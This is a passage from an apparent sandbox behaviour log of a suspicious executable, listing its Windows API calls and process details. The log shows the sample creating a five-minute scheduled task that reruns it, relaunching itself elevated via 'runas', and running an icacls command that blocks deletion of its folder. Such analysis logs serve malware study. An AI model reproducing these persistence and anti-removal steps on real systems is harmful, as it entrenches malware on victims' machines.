dwMilliseconds=0x1) returned 0x102 [0115.382] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.397] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.413] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.429] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.444] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.459] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.475] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.491] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.506] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.522] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.538] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.553] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.569] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0115.611] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x0 [0115.614] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x32a4690 | out: hHeap=0x670000) returned 1 [0115.614] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3262340 | out: hHeap=0x670000) returned 1 [0115.614] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc0) returned 0x328b530 [0115.614] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc0) returned 0x328b5f8 [0115.614] CoInitialize (pvReserved=0x0) returned 0x0 [0116.176] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0116.176] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc0) returned 0x328b6c0 [0116.176] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18d83c | out: ppv=0x18d83c*=0x29a08e0) returned 0x0 [0116.474] TaskScheduler:ITaskService:Connect (This=0x29a08e0, serverName=0x18d2c8*(varType=0x0, wReserved1=0x77c6, wReserved2=0xe0d2, wReserved3=0x77c6, varVal1=0x5f, varVal2=0xc0), user=0x18d2d8*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xc8), domain=0x18d2e8*(varType=0x0, wReserved1=0x0, wReserved2=0xc0, wReserved3=0x0, varVal1=0x5f, varVal2=0x7), password=0x18d2f8*(varType=0x0, wReserved1=0x328, wReserved2=0xd7e4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x670000)) returned 0x0 [0116.477] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x3264510 [0116.477] TaskScheduler:ITaskService:GetFolder (in: This=0x29a08e0, Path="\\", ppFolder=0x18d844 | out: ppFolder=0x18d844*=0x2ff98) returned 0x0 [0116.481] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3264510 | out: hHeap=0x670000) returned 1 [0116.481] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x3264510 [0116.481] ITaskFolder:DeleteTask (This=0x2ff98, Name="Time Trigger Task", flags=0) returned 0x80070002 [0116.484] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3264510 | out: hHeap=0x670000) returned 1 [0116.484] TaskScheduler:ITaskService:NewTask (in: This=0x29a08e0, flags=0x0, ppDefinition=0x18d848 | out: ppDefinition=0x18d848*=0x29a0968) returned 0x0 [0116.487] TaskScheduler:IUnknown:Release (This=0x29a08e0) returned 0x1 [0116.487] ITaskDefinition:get_RegistrationInfo (in: This=0x29a0968, ppRegistrationInfo=0x18d81c | out: ppRegistrationInfo=0x18d81c*=0x29a0a28) returned 0x0 [0116.487] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x3264540 [0116.487] IRegistrationInfo:put_Author (This=0x29a0a28, Author="Author Name") returned 0x0 [0116.487] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3264540 | out: hHeap=0x670000) returned 1 [0116.487] IUnknown:Release (This=0x29a0a28) returned 0x1 [0116.487] ITaskDefinition:get_Principal (in: This=0x29a0968, ppPrincipal=0x18d824 | out: ppPrincipal=0x18d824*=0x29a0bb8) returned 0x0 [0116.487] IPrincipal:put_LogonType (This=0x29a0bb8, LogonType=3) returned 0x0 [0116.487] IUnknown:Release (This=0x29a0bb8) returned 0x1 [0116.487] ITaskDefinition:get_Settings (in: This=0x29a0968, ppSettings=0x18d82c | out: ppSettings=0x18d82c*=0x29a0ad8) returned 0x0 [0116.488] ITaskSettings:put_StartWhenAvailable (This=0x29a0ad8, StartWhenAvailable=1) returned 0x0 [0116.488] IUnknown:Release (This=0x29a0ad8) returned 0x1 [0116.488] ITaskSettings:get_IdleSettings (in: This=0x29a0ad8, ppIdleSettings=0x18d810 | out: ppIdleSettings=0x18d810*=0x29a0b48) returned 0x0 [0116.488] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x3264540 [0116.488] IIdleSettings:put_WaitTimeout (This=0x29a0b48, WaitTimeout="PT5M") returned 0x0 [0116.488] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3264540 | out: hHeap=0x670000) returned 1 [0116.488] IUnknown:Release (This=0x29a0b48) returned 0x1 [0116.488] ITaskDefinition:get_Triggers (in: This=0x29a0968, ppTriggers=0x18d80c | out: ppTriggers=0x18d80c*=0x29a0a98) returned 0x0 [0116.488] ITriggerCollection:Create (in: This=0x29a0a98, Type=1, ppTrigger=0x18d818 | out: ppTrigger=0x18d818*=0x29a0c18) returned 0x0 [0116.489] IUnknown:Release (This=0x29a0a98) returned 0x1 [0116.489] IUnknown:QueryInterface (in: This=0x29a0c18, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18d834 | out: ppvObject=0x18d834*=0x29a0c18) returned 0x0 [0116.489] IUnknown:Release (This=0x29a0c18) returned 0x2 [0116.489] ITrigger:get_Repetition (in: This=0x29a0c18, ppRepeat=0x18d820 | out: ppRepeat=0x18d820*=0x29a0c68) returned 0x0 [0116.489] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x3264540 [0116.489] IRepetitionPattern:put_Interval (This=0x29a0c68, Interval="PT5M") returned 0x0 [0116.489] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3264540 | out: hHeap=0x670000) returned 1 [0116.489] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x3264540 [0116.489] IRepetitionPattern:put_Duration (This=0x29a0c68, Duration="") returned 0x0 [0116.491] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3264540 | out: hHeap=0x670000) returned 1 [0116.492] ITrigger:put_Repetition (This=0x29a0c18, Repetition=0x29a0c68) returned 0x0 [0116.492] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x3264540 [0116.492] ITrigger:put_Id (This=0x29a0c18, Id="Trigger1") returned 0x0 [0116.492] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3264540 | out: hHeap=0x670000) returned 1 [0116.492] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x3264540 [0116.492] ITrigger:put_EndBoundary (This=0x29a0c18, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0116.492] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3264540 | out: hHeap=0x670000) returned 1 [0116.492] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d2f4 | out: lpSystemTimeAsFileTime=0x18d2f4*(dwLowDateTime=0xbd879c30, dwHighDateTime=0x1d62438)) [0116.501] GetLastError () returned 0x0 [0116.517] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x24) returned 0x329d750 [0116.526] GetLastError () returned 0x0 [0116.534] GetLastError () returned 0x0 [0116.542] GetLastError () returned 0x0 [0116.551] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x1 [0116.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d25c | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d25c) returned 26 [0116.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d25c | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d25c) returned 26 [0116.591] GetLastError () returned 0x0 [0116.591] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x24) returned 0x329d5d0 [0116.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x329d5d0, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0116.591] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xa0) returned 0x3280a70 [0116.591] GetLastError () returned 0x0 [0116.591] ITrigger:put_StartBoundary (This=0x29a0c18, StartBoundary="2020-05-07T16:30:16") returned 0x0 [0116.591] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3264540 | out: hHeap=0x670000) returned 1 [0116.591] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3289b70 | out: hHeap=0x670000) returned 1 [0116.591] IUnknown:Release (This=0x29a0c18) returned 0x1 [0116.591] ITaskDefinition:get_Actions (in: This=0x29a0968, ppActions=0x18d828 | out: ppActions=0x18d828*=0x29a09e0) returned 0x0 [0116.592] IActionCollection:Create (in: This=0x29a09e0, Type=0, ppAction=0x18d814 | out: ppAction=0x18d814*=0x29a0ca0) returned 0x0 [0116.593] IUnknown:Release (This=0x29a09e0) returned 0x1 [0116.593] IUnknown:QueryInterface (in: This=0x29a0ca0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18d830 | out: ppvObject=0x18d830*=0x29a0ca0) returned 0x0 [0116.593] IUnknown:Release (This=0x29a0ca0) returned 0x2 [0116.593] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x3264540 [0116.593] IExecAction:put_Path (This=0x29a0ca0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe") returned 0x0 [0116.593] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3264540 | out: hHeap=0x670000) returned 1 [0116.593] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x3264540 [0116.594] IExecAction:put_Arguments (This=0x29a0ca0, Arguments="--Task") returned 0x0 [0116.594] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3264540 | out: hHeap=0x670000) returned 1 [0116.594] IUnknown:Release (This=0x29a0ca0) returned 0x1 [0116.594] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc) returned 0x3264540 [0116.594] ITaskFolder:RegisterTaskDefinition (in: This=0x2ff98, Path="Time Trigger Task", pDefinition=0x29a0968, flags=6, UserId=0x18d2d0*(varType=0x0, wReserved1=0x328, wReserved2=0xd7e4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x670000), password=0x18d2e0*(varType=0x0, wReserved1=0x0, wReserved2=0xc0, wReserved3=0x0, varVal1=0x5f, varVal2=0x7), LogonType=3, sddl=0x18d2f4*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xc8), ppTask=0x18d7fc | out: ppTask=0x18d7fc*=0x29a0d10) returned 0x0 [0116.821] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3264540 | out: hHeap=0x670000) returned 1 [0116.821] TaskScheduler:IUnknown:Release (This=0x2ff98) returned 0x0 [0116.821] TaskScheduler:IUnknown:Release (This=0x29a0968) returned 0x0 [0116.821] IUnknown:Release (This=0x29a0d10) returned 0x0 [0116.821] CoUninitialize () [0116.826] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x328b6c0 | out: hHeap=0x670000) returned 1 [0116.826] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x328b5f8 | out: hHeap=0x670000) returned 1 [0116.826] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x328b530 | out: hHeap=0x670000) returned 1 [0116.826] GetVersion () returned 0x1db10106 [0116.826] lstrcpyW (in: lpString1=0x18dc60, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0116.826] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0116.826] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0116.826] ShellExecuteExW (in: pExecInfo=0x18da24*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18da24*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0116.955] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x32a45d8 | out: hHeap=0x670000) returned 1 [0116.955] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x328b468 | out: hHeap=0x670000) returned 1 [0116.955] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3286c40 | out: hHeap=0x670000) returned 1 [0117.063] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x6c1c58 | out: hHeap=0x670000) returned 1 [0117.063] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x68e688 | out: hHeap=0x670000) returned 1 [0117.064] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3287448 | out: hHeap=0x670000) returned 1 [0117.064] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x3280b18 | out: hHeap=0x670000) returned 1 [0117.064] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x691500 | out: hHeap=0x670000) returned 1 [0117.073] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x690618 | out: hHeap=0x670000) returned 1 [0117.074] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18ecec | out: phModule=0x18ecec) returned 0 [0117.109] ExitProcess (uExitCode=0x0) [0117.113] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x329d750 | out: hHeap=0x670000) returned 1 [0117.114] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x68f250 | out: hHeap=0x670000) returned 1 [0117.191] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0x838 Thread: id = 3 os_tid = 0x848 Thread: id = 4 os_tid = 0x858 Thread: id = 5 os_tid = 0x868 Thread: id = 6 os_tid = 0x878 Thread: id = 7 os_tid = 0x888 Thread: id = 20 os_tid = 0x8f8 Thread: id = 21 os_tid = 0x908 Thread: id = 74 os_tid = 0x948 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 8 os_tid = 0xac0 Thread: id = 9 os_tid = 0x768 Thread: id = 10 os_tid = 0x764 Thread: id = 11 os_tid = 0x758 Thread: id = 12 os_tid = 0x724 Thread: id = 13 os_tid = 0x718 Thread: id = 14 os_tid = 0x714 Thread: id = 15 os_tid = 0x154 Thread: id = 16 os_tid = 0x150 Thread: id = 17 os_tid = 0x118 Thread: id = 18 os_tid = 0xf0 Thread: id = 19 os_tid = 0x898 Thread: id = 116 os_tid = 0x858 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 22 os_tid = 0x8c8 Thread: id = 23 os_tid = 0x688 Thread: id = 24 os_tid = 0x24c Thread: id = 25 os_tid = 0x634 Thread: id = 26 os_tid = 0x48c Thread: id = 27 os_tid = 0x7ac Thread: id = 28 os_tid = 0x2a8 Thread: id = 29 os_tid = 0x23c Thread: id = 30 os_tid = 0x560 Thread: id = 31 os_tid = 0x564 Thread: id = 32 os_tid = 0xbb0 Thread: id = 33 os_tid = 0xbac Thread: id = 34 os_tid = 0xba4 Thread: id = 35 os_tid = 0xb98 Thread: id = 36 os_tid = 0x5d8 Thread: id = 37 os_tid = 0x6cc Thread: id = 38 os_tid = 0x42c Thread: id = 39 os_tid = 0x1e4 Thread: id = 40 os_tid = 0x760 Thread: id = 41 os_tid = 0x75c Thread: id = 42 os_tid = 0x74c Thread: id = 43 os_tid = 0x710 Thread: id = 44 os_tid = 0x6d0 Thread: id = 45 os_tid = 0x6bc Thread: id = 46 os_tid = 0x6b8 Thread: id = 47 os_tid = 0x69c Thread: id = 48 os_tid = 0x698 Thread: id = 49 os_tid = 0x684 Thread: id = 50 os_tid = 0x678 Thread: id = 51 os_tid = 0x4a8 Thread: id = 52 os_tid = 0x46c Thread: id = 53 os_tid = 0x44c Thread: id = 54 os_tid = 0x424 Thread: id = 55 os_tid = 0x41c Thread: id = 56 os_tid = 0x404 Thread: id = 57 os_tid = 0x14c Thread: id = 58 os_tid = 0x3fc Thread: id = 59 os_tid = 0x3f4 Thread: id = 60 os_tid = 0x3e8 Thread: id = 61 os_tid = 0x39c Thread: id = 62 os_tid = 0x390 Thread: id = 63 os_tid = 0x38c Thread: id = 64 os_tid = 0x37c Thread: id = 65 os_tid = 0x374 Thread: id = 112 os_tid = 0x388 Thread: id = 113 os_tid = 0x68c Thread: id = 114 os_tid = 0x158 Process: id = "4" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x3dd6c000" os_pid = "0x918" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x54c" cmd_line = "icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 66 os_tid = 0x928 Thread: id = 67 os_tid = 0x938 Process: id = "5" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x76a3f000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4568F795-B030-4E70-B052-419BC1469E0B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 68 os_tid = 0xacc Thread: id = 69 os_tid = 0x36c Thread: id = 70 os_tid = 0x5b4 Thread: id = 71 os_tid = 0x59c Thread: id = 72 os_tid = 0x594 Thread: id = 73 os_tid = 0x58c Thread: id = 98 os_tid = 0xb7c Thread: id = 115 os_tid = 0x938 Process: id = "6" image_name = "585939.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\585939.exe" page_root = "0x3f924000" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x54c" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 75 os_tid = 0x968 [0117.293] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xbdf51b70, dwHighDateTime=0x1d62438)) [0117.293] GetCurrentProcessId () returned 0x958 [0117.293] GetCurrentThreadId () returned 0x968 [0117.293] GetTickCount () returned 0x1152ae8 [0117.293] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=23774248504) returned 1 [0117.356] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x40e6f9)) [0117.356] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.356] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x230000 [0117.357] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.358] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0117.358] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0117.358] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0117.358] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0117.359] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x214) returned 0x2307d0 [0117.359] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0117.359] GetCurrentThreadId () returned 0x968 [0117.359] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40beaf, hStdOutput=0x40c1e8, hStdError=0x2307d0)) [0117.359] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x800) returned 0x2309f0 [0117.360] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.360] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0117.360] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.360] SetHandleCount (uNumber=0x20) returned 0x20 [0117.360] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" --Admin IsNotAutoStart IsNotTask" [0117.360] 